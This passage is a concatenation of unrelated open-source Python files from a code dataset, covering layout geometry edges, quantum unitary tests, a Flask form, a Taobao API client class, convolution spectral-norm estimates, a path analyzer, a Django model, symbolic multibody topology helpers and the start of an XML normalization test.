SamePageEdge.__init__(self, A, B, length, overlap)
try:
self.iou = max(0, self.overlap) / (abs(A.y2-A.y1) + abs(B.y2-B.y1) - abs(self.overlap))
except ZeroDivisionError:
self.iou = 0
def computeOverlap(self):
"""
compute the vertical overlap between the two nodes
return 0 or a positive number in case of overlap
"""
return max(0, min(self.A.y2, self.B.y2) - max(self.A.y1, self.B.y1))
def computeOverlapPosition(self):
"""
compute the vertical overlap between the two nodes and its position
relative to each node.
The overlap is a length
The position is a number in [-1, +1] relative to the center of a node.
        -1 denotes left or top, +1 denotes right or bottom.
The position is the position of the center of overlap.
return a tuple: (overlap, pos_on_A, pos_on_B)
"""
y1 = max(self.A.y1, self.B.y1)
y2 = min(self.A.y2, self.B.y2)
ovrl = max(0, y2 - y1)
if ovrl > 0:
m = (y1 + y2) / 2.0
pA = (m + m - self.A.y1 - self.A.y2) / abs(self.A.y2 - self.A.y1)
pB = (m + m - self.B.y1 - self.B.y2) / abs(self.B.y2 - self.B.y1)
return (m, pA, pB)
else:
return 0, 0, 0
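    # Worked example (illustrative): if A spans y in [0, 10] and B spans y in [5, 15],
    # the overlap region is [5, 10] (length 5) and this returns (7.5, 0.5, -0.5): the
    # centre of the overlap, which lies halfway towards the bottom of A and halfway
    # towards the top of B.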
class VerticalEdge(SamePageEdge):
def __init__(self, A, B, length, overlap):
SamePageEdge.__init__(self, A, B, length, overlap)
try:
self.iou = max(0, self.overlap) / (abs(A.x2-A.x1) + abs(B.x2-B.x1) - abs(self.overlap))
except ZeroDivisionError:
self.iou = 0
def computeOverlap(self):
"""
compute the horizontal overlap between the two nodes
return 0 or a positive number in case of overlap
"""
return max(0, min(self.A.x2, self.B.x2) - max(self.A.x1, self.B.x1))
def computeOverlapPosition(self):
"""
compute the horizontal overlap between the two nodes and its position
relative to each node.
The overlap is a length
The position is a number in [-1, +1] relative to the center of a node.
        -1 denotes left or top, +1 denotes right or bottom.
The position is the position of the center of overlap.
return a tuple: (overlap, pos_on_A, pos_on_B)
"""
x1 = max(self.A.x1, self.B.x1)
x2 = min(self.A.x2, self.B.x2)
ovrl = max(0, x2 - x1)
if ovrl > 0:
m = (x1 + x2) / 2.0
pA = (m + m - self.A.x1 - self.A.x2) / abs(self.A.x2 - self.A.x1)
pB = (m + m - self.B.x1 - self.B.x2) / abs(self.B.x2 - self.B.x1)
return (m, pA, pB)
else:
return 0, 0, 0
|
StarcoderdataPython
|
4814670
|
<gh_stars>1-10
'''
Tests for stoqcompiler.unitary modules.
'''
import pytest
import numpy as np
from stoqcompiler.unitary import (
Unitary,
UnitarySequence,
UnitarySequenceEntry,
UnitaryDefinitions,
ParameterizedUnitary,
ParameterizedUnitaryParameter,
ParameterizedUnitaryDefinitions)
class TestUnitary:
def test_default(self) -> None:
dimension = 4
unitary = Unitary(dimension)
assert unitary.get_dimension() == dimension
assert unitary.close_to(np.identity(dimension))
def test_non_square_matrix(self) -> None:
dimension = 2
with pytest.raises(Exception):
Unitary(dimension, np.array([[1, 0, 0], [0, 1, 0]]))
def test_non_unitary_matrix(self) -> None:
dimension = 2
with pytest.raises(Exception):
Unitary(dimension, np.array([[1, 0], [1, 1]]))
def test_mismatched_dimension(self) -> None:
dimension = 4
with pytest.raises(Exception):
Unitary(dimension, np.identity(dimension - 1))
def test_inverse_fixed(self) -> None:
dimension = 2
operation_name = 'U'
unitary = Unitary(dimension, np.array([
[np.exp(1j * np.pi / 4), 0],
[0, 1j]]), operation_name)
inverse = unitary.inverse()
assert unitary.left_multiply(inverse).close_to(np.identity(dimension))
assert unitary.right_multiply(inverse).close_to(np.identity(dimension))
assert inverse.get_display_name() == 'U†'
double_inverse = inverse.inverse()
assert double_inverse.get_display_name() == 'U'
assert unitary.close_to(double_inverse)
def test_inverse_random(self) -> None:
dimension = 2
unitary = Unitary.random(dimension)
inverse = unitary.inverse()
assert unitary.left_multiply(inverse).close_to(np.identity(dimension))
assert unitary.right_multiply(inverse).close_to(np.identity(dimension))
def test_tensor(self) -> None:
dimension = 2
unitary = Unitary(dimension)
tensor_product = unitary.tensor(unitary)
assert tensor_product.get_dimension() == dimension ** 2
assert tensor_product.close_to(np.identity(dimension ** 2))
tensor_product = UnitaryDefinitions.sigmax().tensor(
UnitaryDefinitions.sigmax())
assert tensor_product.get_dimension() == dimension ** 2
assert not tensor_product.close_to(np.identity(dimension ** 2))
tensor_product = tensor_product.left_multiply(tensor_product)
assert tensor_product.close_to(np.identity(dimension ** 2))
def test_multiply(self) -> None:
dimension = 2
identity = Unitary.identity(dimension)
product = Unitary(dimension)
product = product.left_multiply(UnitaryDefinitions.sigmax())
assert product.close_to(UnitaryDefinitions.sigmax())
product = product.right_multiply(UnitaryDefinitions.sigmay())
assert product.close_to(UnitaryDefinitions.sigmaz())
product = product.left_multiply(UnitaryDefinitions.sigmaz())
assert product.close_to(identity)
def test_definitions(self) -> None:
dimension = 2
identity_1q = Unitary.identity(dimension)
h = UnitaryDefinitions.h()
assert h.left_multiply(h).close_to(identity_1q)
t = UnitaryDefinitions.t()
assert t.left_multiply(t).left_multiply(t).left_multiply(t).close_to(
UnitaryDefinitions.sigmaz())
dimension = 8
identity_3q = Unitary.identity(dimension)
ccnot = UnitaryDefinitions.ccnot()
assert ccnot.left_multiply(ccnot).close_to(identity_3q)
qecc = UnitaryDefinitions.qecc_phase_flip()
assert qecc.left_multiply(qecc.inverse()).close_to(identity_3q)
def test_rphi(self) -> None:
theta_values = [
0, np.pi / 8, np.pi / 4, np.pi, 3 * np.pi / 2, -np.pi / 4]
for theta in theta_values:
assert UnitaryDefinitions.rphi(theta, 0).close_to(
UnitaryDefinitions.rx(theta))
assert UnitaryDefinitions.rphi(theta, np.pi / 2).close_to(
UnitaryDefinitions.ry(theta))
def test_display_name(self) -> None:
dimension = 2
operation_name = "Rx"
unitary = Unitary(dimension, np.array([
[np.exp(1j * np.pi / 4), 0],
[0, 1j]]), operation_name)
display_name_with_zero_parameters = unitary.get_display_name()
assert isinstance(display_name_with_zero_parameters, str)
assert operation_name == display_name_with_zero_parameters
parameter_name_1 = "abc"
unitary = Unitary(
dimension, unitary.get_matrix(), operation_name,
{parameter_name_1: (1.0, True)})
display_name_with_one_parameter = unitary.get_display_name()
assert isinstance(display_name_with_one_parameter, str)
assert operation_name in display_name_with_one_parameter
parameter_name_2 = "def"
unitary = Unitary(
dimension, unitary.get_matrix(), operation_name,
{parameter_name_1: (1.0, True), parameter_name_2: (2.0, False)})
display_name_with_two_parameters = unitary.get_display_name()
print(display_name_with_two_parameters)
assert isinstance(display_name_with_two_parameters, str)
assert operation_name in display_name_with_two_parameters
assert parameter_name_1 in display_name_with_two_parameters
assert parameter_name_2 in display_name_with_two_parameters
def test_qasm(self) -> None:
dimension = 2
operation_name = "Rcustom"
unitary = Unitary(dimension, np.array([
[np.exp(1j * np.pi / 4), 0],
[0, 1j]]), operation_name)
assert unitary.get_qasm() == operation_name + "\t" + "q[0];"
def test_jaqal(self) -> None:
dimension = 2
operation_name = "Rcustom"
unitary = Unitary(dimension, np.array([
[np.exp(1j * np.pi / 4), 0],
[0, 1j]]), operation_name)
assert unitary.get_jaqal() == operation_name + " q[0] "
def test_gms(self) -> None:
for num_qubits in [3, 4, 5]:
u = UnitaryDefinitions.gms(num_qubits)
assert (u.left_multiply(u).left_multiply(u).left_multiply(u)
.close_to(Unitary.identity(u.get_dimension())))
class TestParameterizedUnitary:
def test_parameterized_rotation(self) -> None:
dimension = 2
def rotation_matrix(
alpha: float,
beta: float,
gamma: float
) -> np.ndarray:
return np.array(
[[np.cos(beta / 2) * np.exp(-1j * (alpha + gamma) / 2),
-np.sin(beta / 2) * np.exp(-1j * (alpha - gamma) / 2)],
[np.sin(beta / 2) * np.exp(1j * (alpha - gamma) / 2),
np.cos(beta / 2) * np.exp(1j * (alpha + gamma) / 2)]])
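        # Sanity check (illustrative): with beta = 0 the matrix above reduces to
        # diag(exp(-1j*(alpha+gamma)/2), exp(+1j*(alpha+gamma)/2)), i.e. a pure phase rotation,
        # which is why rotation.as_unitary([0, 0, 0]) below is the identity.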
min_value = 0
max_value = 2 * np.pi
parameters = [ParameterizedUnitaryParameter(
"alpha", min_value, max_value, is_angle=True),
ParameterizedUnitaryParameter(
"beta", min_value, max_value, is_angle=True),
ParameterizedUnitaryParameter(
"gamma", min_value, max_value, is_angle=True)]
operation_name = "R"
rotation = ParameterizedUnitary(
dimension, rotation_matrix, parameters, operation_name)
zero_rotation_unitary = rotation.as_unitary([0, 0, 0])
assert zero_rotation_unitary.close_to(Unitary.identity(dimension))
assert operation_name in zero_rotation_unitary.get_display_name()
assert [
p.get_parameter_name()
in zero_rotation_unitary.get_display_name()
for p in parameters]
random_values = [p.random_value() for p in parameters]
assert np.all([
parameters[i].is_valid(r)
for i, r in enumerate(random_values)])
random_rotation_unitary = rotation.as_unitary(random_values)
assert operation_name in random_rotation_unitary.get_display_name()
assert [
p.get_parameter_name()
in random_rotation_unitary.get_display_name()
for p in parameters]
assert random_rotation_unitary.left_multiply(
random_rotation_unitary.inverse()).close_to(
Unitary.identity(dimension))
def test_parameterized_unitary_classmethods(self) -> None:
rotation_xy = ParameterizedUnitaryDefinitions.rotation_xy()
zero_rotation_unitary = rotation_xy.as_unitary([0, 0])
assert zero_rotation_unitary.close_to(
Unitary.identity(rotation_xy.get_dimension()))
rotation_xyz = ParameterizedUnitaryDefinitions.rotation_xyz()
zero_rotation_unitary = rotation_xyz.as_unitary([0, 0, 0])
assert zero_rotation_unitary.close_to(
Unitary.identity(rotation_xyz.get_dimension()))
xx = ParameterizedUnitaryDefinitions.xx()
xx_angle = 2 * np.pi
full_rotation_unitary = xx.as_unitary([xx_angle])
assert full_rotation_unitary.close_to(
Unitary.identity(xx.get_dimension()))
angle_parameter_name = xx.get_parameters()[0].get_parameter_name()
assert (xx_angle, True) == full_rotation_unitary.get_parameter_value(
angle_parameter_name)
gms = ParameterizedUnitaryDefinitions.gms(num_qubits=2)
gms_angle = np.pi / 3
gms_unitary = gms.as_unitary([gms_angle])
assert gms_unitary.close_to(
ParameterizedUnitaryDefinitions.xx().as_unitary([gms_angle]))
angle_parameter_name = gms.get_parameters()[0].get_parameter_name()
assert (gms_angle, True) == gms_unitary.get_parameter_value(
angle_parameter_name)
def test_parameterized_unitary_time_evolution(self) -> None:
sigmax = np.array([[0, 1], [1, 0]])
t_min = -1.234
t_max = 1.234
time_evolution = ParameterizedUnitaryDefinitions.time_evolution(
sigmax, t_min, t_max)
zero_time_unitary = time_evolution.as_unitary([0])
assert zero_time_unitary.close_to(
Unitary.identity(time_evolution.get_dimension()))
evolution_time = t_max / 2.0
forward_time_unitary = time_evolution.as_unitary([evolution_time])
backward_time_unitary = time_evolution.as_unitary([-evolution_time])
assert forward_time_unitary.close_to(backward_time_unitary.inverse())
time_parameter_name = (time_evolution.get_parameters()[0]
.get_parameter_name())
assert (
(evolution_time, False)
== forward_time_unitary.get_parameter_value(time_parameter_name))
assert (
(-evolution_time, False)
== backward_time_unitary.get_parameter_value(time_parameter_name))
with pytest.raises(Exception):
# switch ordering of t_min and t_max
time_evolution = ParameterizedUnitaryDefinitions.time_evolution(
sigmax, t_max, t_min)
with pytest.raises(Exception):
# time outside valid range
time_evolution.as_unitary([2 * t_max])
class TestUnitarySequenceEntry:
def test_identity(self) -> None:
dimension = 2
entry = UnitarySequenceEntry(Unitary.identity(dimension), [0])
assert entry.get_dimension() == dimension
assert np.array_equal(entry.get_apply_to(), [0])
for system_dimension in [2, 4, 8, 16]:
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(Unitary.identity(system_dimension))
def test_cnot(self) -> None:
entry = UnitarySequenceEntry(UnitaryDefinitions.cnot(), [0, 1])
with pytest.raises(Exception):
system_dimension = 2
full_unitary = entry.get_full_unitary(system_dimension)
system_dimension = 4
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(UnitaryDefinitions.cnot())
system_dimension = 8
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(
UnitaryDefinitions.cnot().tensor(Unitary.identity(2)))
system_dimension = 16
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(
UnitaryDefinitions.cnot().tensor(Unitary.identity(4)))
assert full_unitary.left_multiply(full_unitary).close_to(
Unitary.identity(system_dimension))
def test_cnot_swapped(self) -> None:
dimension = 4
entry = UnitarySequenceEntry(UnitaryDefinitions.cnot(), [1, 0])
system_dimension = 4
full_unitary = entry.get_full_unitary(system_dimension)
assert full_unitary.close_to(Unitary(dimension, np.array(
[[1, 0, 0, 0],
[0, 0, 0, 1],
[0, 0, 1, 0],
[0, 1, 0, 0]])))
class TestUnitarySequence:
def test_default(self) -> None:
dimension = 2
sequence = UnitarySequence(dimension)
assert sequence.get_dimension() == dimension
assert sequence.product().close_to(np.identity(dimension))
def test_identity_roots_correct(self) -> None:
dimension = 2
t = Unitary(dimension, np.array([[1, 0], [0, np.exp(1j * np.pi / 4)]]))
t_entry = UnitarySequenceEntry(t, [0])
sequence = UnitarySequence(dimension, np.repeat(t_entry, 8))
assert sequence.get_dimension() == dimension
assert sequence.get_length() == 8
assert sequence.product().close_to(np.identity(dimension))
def test_identity_roots_incorrect(self) -> None:
dimension = 2
t = Unitary(dimension, np.array([[1, 0], [0, np.exp(1j * np.pi / 4)]]))
t_entry = UnitarySequenceEntry(t, [0])
sequence = UnitarySequence(dimension, np.repeat(t_entry, 7))
assert sequence.get_dimension() == dimension
assert sequence.get_length() == 7
assert not sequence.product().close_to(np.identity(dimension))
def test_append_and_remove(self) -> None:
dimension = 2
identity = Unitary.identity(dimension)
sequence = UnitarySequence(dimension)
assert sequence.get_length() == 0
assert sequence.product().close_to(identity)
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmax(), [0]))
assert sequence.get_length() == 1
assert sequence.product().close_to(UnitaryDefinitions.sigmax())
sequence.append_last(
UnitarySequenceEntry(UnitaryDefinitions.sigmay(), [0]))
assert sequence.get_length() == 2
assert sequence.product().close_to(UnitaryDefinitions.sigmaz())
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmaz(), [0]))
assert sequence.get_length() == 3
assert sequence.product().close_to(identity)
sequence.remove_last()
assert sequence.get_length() == 2
assert sequence.product().close_to(UnitaryDefinitions.sigmay())
sequence.remove_first()
assert sequence.get_length() == 1
assert sequence.product().close_to(UnitaryDefinitions.sigmax())
sequence.remove_first()
assert sequence.get_length() == 0
assert sequence.product().close_to(identity)
def test_undo(self) -> None:
dimension = 2
identity = Unitary.identity(dimension)
sequence = UnitarySequence(dimension)
assert sequence.get_length() == 0
with pytest.raises(Exception):
sequence.undo()
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmax(), [0]))
assert sequence.get_length() == 1
assert sequence.product().close_to(UnitaryDefinitions.sigmax())
sequence.undo()
assert sequence.get_length() == 0
assert sequence.product().close_to(identity)
with pytest.raises(Exception):
sequence.undo()
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmay(), [0]))
sequence.append_first(
UnitarySequenceEntry(UnitaryDefinitions.sigmay(), [0]))
assert sequence.get_length() == 2
assert sequence.product().close_to(identity)
sequence.remove_last()
assert sequence.get_length() == 1
assert sequence.product().close_to(UnitaryDefinitions.sigmay())
sequence.undo()
assert sequence.get_length() == 2
assert sequence.product().close_to(identity)
with pytest.raises(Exception):
sequence.undo()
def test_combine(self) -> None:
dimension = 2
t = Unitary(dimension, np.array([[1, 0], [0, np.exp(1j * np.pi / 4)]]))
t_entry = UnitarySequenceEntry(t, [0])
sequence_1 = UnitarySequence(
dimension, np.repeat(t_entry, 3))
sequence_2 = UnitarySequence(
dimension, [
UnitarySequenceEntry(UnitaryDefinitions.sigmay(), [0])])
combined_sequence = UnitarySequence.combine(sequence_1, sequence_2)
assert (combined_sequence.get_length()
== sequence_1.get_length() + sequence_2.get_length())
assert combined_sequence.product().close_to(
sequence_1.product().left_multiply(sequence_2.product()))
def test_inverse(self) -> None:
dimension = 2
rx_entry = UnitarySequenceEntry(UnitaryDefinitions.rx(np.pi / 3), [0])
ry_entry = UnitarySequenceEntry(UnitaryDefinitions.ry(np.pi / 3), [0])
sequence = UnitarySequence(dimension, [rx_entry, ry_entry])
product = sequence.product()
inverse_sequence = sequence.inverse()
inverse_product = inverse_sequence.product()
assert inverse_product.close_to(product.inverse())
inverse_sequence.sequence_product = None
inverse_product = inverse_sequence.product()
assert inverse_product.close_to(product.inverse())
def test_sequence_output_formats(self) -> None:
dimension = 2
rx_entry = UnitarySequenceEntry(UnitaryDefinitions.rx(np.pi / 3), [0])
ry_entry = UnitarySequenceEntry(UnitaryDefinitions.ry(np.pi / 3), [0])
sequence = UnitarySequence(dimension, [rx_entry, ry_entry])
assert sequence.get_qasm()
assert sequence.get_jaqal()
assert sequence.get_display_output()
|
StarcoderdataPython
|
1711335
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, TextAreaField, SelectField
from wtforms.validators import DataRequired, Length, Email
class FeedbackForm(FlaskForm):
name = StringField('Name *', validators=[DataRequired(), Length(min=0, max=50)])
email = StringField('Email *', validators=[DataRequired(), Email()])
subject = SelectField('Subject *',
choices=[('Saying hello', 'hello'), ('Question', 'Question'), ('Support', 'Support'),
('Feedback', 'Feedback'), ('A joke', 'A joke'), ('Enhancement', 'Enhancement'),
('Something else', 'Something else')], validators=[DataRequired()])
message = TextAreaField('Message *', validators=[DataRequired(), Length(min=0, max=500)])
submit = SubmitField('Say Hello')
def to_json(self):
"""
Converts the form to a dict suitable for JSON serialization.
The csrf_token is not included in the response.
:return: dict representing the contents of the form
:rtype: dict
"""
feedback_dict = {'name': self.name.data, 'email': self.email.data, 'subject': self.subject.data,
'message': self.message.data}
return feedback_dict
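# --- Usage sketch (illustrative, not part of the original module) ----------
# A minimal, hedged example of wiring this form into a view and returning
# to_json() as the response body. The Flask app, the "/feedback" route, the
# SECRET_KEY value and the posted field values below are assumptions made for
# the demo only; CSRF is disabled just so the sketch runs without a token.
if __name__ == "__main__":
    from flask import Flask, jsonify

    app = Flask(__name__)
    app.config["SECRET_KEY"] = "example-secret"
    app.config["WTF_CSRF_ENABLED"] = False

    @app.route("/feedback", methods=["POST"])
    def feedback():
        form = FeedbackForm()
        if form.validate_on_submit():
            return jsonify(form.to_json()), 200
        return jsonify(form.errors), 400

    # Exercise the route with Flask's test client instead of a live server.
    with app.test_client() as client:
        response = client.post("/feedback", data={
            "name": "Ada", "email": "ada@example.com",
            "subject": "Feedback", "message": "Hello there",
        })
        print(response.status_code, response.get_json())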
|
StarcoderdataPython
|
114588
|
'''
Created by auto_sdk on 2016.03.15
'''
from top.api.base import RestApi
class FenxiaoDistributorItemsGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.distributor_id = None
self.end_modified = None
self.page_no = None
self.page_size = None
self.product_id = None
self.start_modified = None
def getapiname(self):
return 'taobao.fenxiao.distributor.items.get'
|
StarcoderdataPython
|
144030
|
from .DBWorker import DatabaseWorker
from .models import Base
Base.metadata.create_all(DatabaseWorker.engine)
|
StarcoderdataPython
|
3351959
|
import numpy as np
import chainer
from chainer.cuda import get_array_module
from chainer.functions import convolution_2d, deconvolution_2d
from chainer.backends import cuda
from src.function.pooling import factor
if cuda.available:
def normalize(arr, axis):
norm = cuda.reduce('T x', 'T out',
'x * x', 'a + b', 'out = sqrt(a)', 0,
'norm_conv')(arr, axis=axis, keepdims=True)
cuda.elementwise('T norm',
'T x',
'x /= (norm + 1e-20)',
'div_conv_norm')(norm, arr)
return norm
else:
def normalize(arr, axis):
norm = np.sqrt((arr ** 2).sum(axis, keepdims=True))
arr /= norm + 1e-20
return norm
def conv_spectral_norm_exact(kernel, shape, stride, pad):
xp = get_array_module(kernel)
kernel = kernel.astype(xp.float64)
shape = (128,) + shape[1:]
x = xp.random.normal(size=shape).astype(xp.float64)
normalize(x, (1, 2, 3))
prev = None
eps = 1e20
with chainer.no_backprop_mode():
for i in range(5000):
x = convolution_2d(x, kernel, stride=stride, pad=pad).array
x = deconvolution_2d(x, kernel, stride=stride, pad=pad).array
norm = normalize(x, (1, 2, 3))
if prev is not None:
eps = norm - prev
prev = norm
f = xp.abs(eps) * np.prod(shape[1:])
error = (f + xp.sqrt(f * (4 * prev + f))) / 2
return xp.sqrt(xp.max(prev + error))
def conv_spectral_norm_improved(kernel, shape, stride, pad):
xp = get_array_module(kernel)
s, v, d = xp.linalg.svd(kernel.reshape(kernel.shape[0], -1))
return xp.max(v) * factor(shape, kernel.shape[2:], stride, pad)
def conv_spectral_norm_parseval(kernel, shape, stride, pad):
xp = get_array_module(kernel)
s, v, d = xp.linalg.svd(kernel.reshape(kernel.shape[0], -1))
factor = xp.sqrt(kernel.shape[2] * kernel.shape[3])
return xp.max(v) * factor
def conv_frobenius_norm(kernel, shape, stride, pad):
return (kernel ** 2).sum()
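# --- Usage sketch (illustrative, not part of the original module) ----------
# A minimal, hedged example of calling the cheaper norm estimates above. The
# kernel layout (out_channels, in_channels, kh, kw), the input shape
# (N, C, H, W) and the stride/pad values are arbitrary assumptions following
# Chainer's convolution convention; only functions defined in this file are
# used.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    demo_kernel = rng.normal(size=(16, 3, 3, 3)).astype(np.float32)
    demo_shape = (1, 3, 32, 32)
    print("Parseval-style bound:",
          float(conv_spectral_norm_parseval(demo_kernel, demo_shape, stride=1, pad=1)))
    print("Squared Frobenius norm:",
          float(conv_frobenius_norm(demo_kernel, demo_shape, stride=1, pad=1)))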
|
StarcoderdataPython
|
3372531
|
<gh_stars>1-10
from dataclasses import dataclass
from typing import Optional
from meeshkan.nlp.entity_extractor import EntityExtractor
from meeshkan.nlp.ids.gib_detect import GibberishDetector
from meeshkan.nlp.ids.id_classifier import IdClassifier, IdType
@dataclass(frozen=True)
class IdDesc:
value: Optional[str]
type: Optional[IdType] = None
@dataclass(frozen=True)
class PathItems:
entity: Optional[str]
id: Optional[IdDesc]
action: Optional[str] = None
group_id: Optional[IdDesc] = None
class PathAnalyzer:
def __init__(self, entity_extractor: EntityExtractor):
self._entity_extractor = entity_extractor
self._gib_detector = GibberishDetector()
self._id_classifier = IdClassifier()
def extract_values(self, path):
path_list = path.split("/")[1:]
entity_name = self._entity_extractor.get_entity_from_path(path_list)
entity_position = 0
for word in path_list:
if entity_name in word:
entity_position = path_list.index(word)
id_position, id_value, id_type = self._get_last_id(path_list)
if id_type is not None:
if id_position > entity_position:
return PathItems(
entity=entity_name, id=IdDesc(value=id_value, type=id_type),
)
else:
return PathItems(entity=entity_name, id=None)
else:
return PathItems(entity=entity_name, id=None,)
def _get_last_id(self, path_items):
for item in reversed(path_items):
id_type = self._id_classifier.by_value(item)
if id_type != IdType.UNKNOWN:
return path_items.index(item), item, id_type
return None, None, None
|
StarcoderdataPython
|
3341709
|
# Generated by Django 2.0.8 on 2019-01-23 02:44
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('conservation', '0005_auto_20190122_1638'),
]
operations = [
migrations.AddField(
model_name='managementaction',
name='document',
field=models.ForeignKey(blank=True, help_text='The document in which this management action is specified.', null=True, on_delete=django.db.models.deletion.SET_NULL, to='conservation.Document', verbose_name='Plan document'),
),
]
|
StarcoderdataPython
|
1645366
|
<reponame>khaledghobashy/asurt_mbdt
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 27 08:49:16 2019
@author: khaled.ghobashy
"""
# Standard library imports
import os
# 3rd party library imports
import cloudpickle
import sympy as sm
# Local applicataion imports
from ...symbolic.components import joints as joints
from ...symbolic.components import forces as forces
from ...symbolic.systems import topology_classes as topology_classes
from ...symbolic.systems import configuration_classes as cfg_cls
from ...symbolic.components.matrices import vector
###############################################################################
class abstract_decorator(object):
def __init__(self, sym_system):
self._sym_system = sym_system
self._decorate_items()
@property
def _items(self):
members = {i:getattr(self, i) for i in dir(self) if not i.startswith('_') and not i.startswith("__")}
return members
def _decorate_items(self):
for attr, obj in self._items.items():
setattr(self, attr, self._decorate(obj))
def _decorate(self, constructor):
raise NotImplementedError
class joints_container(abstract_decorator):
def __init__(self, topology):
self.spherical = joints.spherical
self.revolute = joints.revolute
self.universal = joints.universal
self.translational = joints.translational
self.cylinderical = joints.cylinderical
self.tripod = joints.tripod
self.fixed = joints.fixed
self.fixed_orientation = joints.fixed_orientation
self.inline = joints.inline
super().__init__(topology)
self._topology = self._sym_system
def _decorate(self, edge_component):
def decorated(*args, **kwargs):
self._topology.add_joint(edge_component, *args, **kwargs)
return decorated
class actuators_container(abstract_decorator):
def __init__(self, topology):
self.rotational_actuator = joints.rotational_actuator
self.absolute_locator = joints.absolute_locator
self.translational_actuator = joints.translational_actuator
self.absolute_rotator = joints.absolute_rotator
super().__init__(topology)
self._topology = self._sym_system
def _decorate(self, edge_component):
if issubclass(edge_component, joints.absolute_locator):
def decorated(*args, **kwargs):
self._topology.add_absolute_actuator(edge_component, *args, **kwargs)
elif issubclass(edge_component, joints.absolute_rotator):
def decorated(*args, **kwargs):
self._topology.add_absolute_actuator(edge_component, *args, **kwargs)
else:
def decorated(*args, **kwargs):
self._topology.add_joint_actuator(edge_component, *args, **kwargs)
return decorated
class forces_container(abstract_decorator):
def __init__(self, topology):
self.TSDA = forces.TSDA
self.local_force = forces.local_force
self.local_torque = forces.local_torque
self.generic_load = forces.generic_load
self.isotropic_bushing = forces.isotropic_bushing
self.generic_bushing = forces.generic_bushing
super().__init__(topology)
self._topology = self._sym_system
def _decorate(self, edge_component):
def decorated(*args, **kwargs):
self._topology.add_force(edge_component, *args, **kwargs)
return decorated
class geometries_nodes(abstract_decorator):
def __init__(self, config_instance):
self._sym = 'gm'
self._symbolic_type = cfg_cls.Geometry
# Geometry Constructors
self.Composite_Geometry = cfg_cls.Composite_Geometry
self.Cylinder_Geometry = cfg_cls.Cylinder_Geometry
self.Triangular_Prism = cfg_cls.Triangular_Prism
self.Sphere_Geometry = cfg_cls.Sphere_Geometry
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(name, args, mirror=False):
node = self._config.add_node(name, self._symbolic_type, self._sym, mirror)
self._config.add_relation(constructor, node, args, mirror)
return decorated
class scalar_nodes(abstract_decorator):
def __init__(self, config_instance):
self._sym = ''
self._symbolic_type = sm.symbols
# Constructors
self.Equal_to = cfg_cls.Equal_to
self.UserInput = None
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(name, args=None):
node = self._config.add_node(name, self._symbolic_type, self._sym)
if constructor:
self._config.add_relation(constructor, node, args)
return decorated
class vector_nodes(abstract_decorator):
def __init__(self, config_instance):
self._sym = 'vc'
self._symbolic_type = vector
# Constructors
self.Mirrored = cfg_cls.Mirrored
self.Oriented = cfg_cls.Oriented
self.Equal_to = cfg_cls.Equal_to
self.UserInput = None
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(name, args=None, mirror=False):
node = self._config.add_node(name, self._symbolic_type, self._sym, mirror)
if constructor:
self._config.add_relation(constructor, node, args, mirror)
return decorated
class points_nodes(abstract_decorator):
def __init__(self, config_instance):
self._sym = 'hp'
self._symbolic_type = vector
# Constructors
self.Mirrored = cfg_cls.Mirrored
self.Centered = cfg_cls.Centered
self.Equal_to = cfg_cls.Equal_to
self.UserInput = None
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(name, args=None, mirror=False):
node = self._config.add_node(name, self._symbolic_type, self._sym, mirror)
if constructor:
self._config.add_relation(constructor, node, args, mirror)
return decorated
class relations_methods(abstract_decorator):
def __init__(self, config_instance):
# Constructors
self.Mirrored = cfg_cls.Mirrored
self.Centered = cfg_cls.Centered
self.Oriented = cfg_cls.Oriented
self.Equal_to = cfg_cls.Equal_to
super().__init__(config_instance)
self._config = self._sym_system
def _decorate(self, constructor):
def decorated(node, args, mirror=False):
self._config.add_relation(constructor, node, args, mirror)
return decorated
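# --- Usage sketch (illustrative, not part of the original module) ----------
# A minimal, hedged demonstration of the decorator pattern above using a
# stand-in topology object; the real symbolic topology classes are not needed
# to see the forwarding behaviour. The `_FakeTopology` class and the argument
# names passed to `spherical(...)` are assumptions made purely for the demo,
# and the block only runs when the module is executed inside the package
# (e.g. via `python -m`).
if __name__ == '__main__':
    class _FakeTopology(object):
        def __init__(self):
            self.calls = []

        def add_joint(self, edge_component, *args, **kwargs):
            self.calls.append((edge_component, args, kwargs))

    demo_topology = _FakeTopology()
    demo_joints = joints_container(demo_topology)
    demo_joints.spherical('uca_sph', 'rbr_uca', 'rbr_upright')  # hypothetical names
    print(demo_topology.calls)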
|
StarcoderdataPython
|
3261365
|
from django.db import models
class FeedTimetable(models.Model):
feed = models.ForeignKey('Feed')
timetable_url = models.URLField()
fetch_last_modified = models.CharField(max_length=50, blank=True, null=True)
last_processed_zip = models.CharField(max_length=50, blank=True, null=True)
active = models.BooleanField(default=True)
processed_watermark = models.DateTimeField(blank=True, null=True)
class Meta:
unique_together = ('feed', 'timetable_url')
def __str__(self):
return f'{self.feed.slug} - {self.timetable_url}'
|
StarcoderdataPython
|
3240161
|
<reponame>LINXNet/pyOCNOS
"""
This test module covers test cases for the function pyocnos.diff.normalize_tree()
"""
from lxml import etree
from pyocnos.diff import normalize_tree
def test_normalize_tree():
"""
Ensure normalize_tree() strips namespaces, prefixes, redundant whitespace and newlines.
"""
string = """
<data xmlns="http://www.company.com/TOOSchema/BarOS"
xmlns:a="http://www.company.com/TOOSchema/BarOS"
xmlns:b="http://www.company.com/TOOSchema/BarOS">
<snmp xmlns="http://www.company.com/TOOSchema/BarOS"> foo
</snmp>
<vr xmlns="http://www.company.com/TOOSchema/BarOS"></vr>
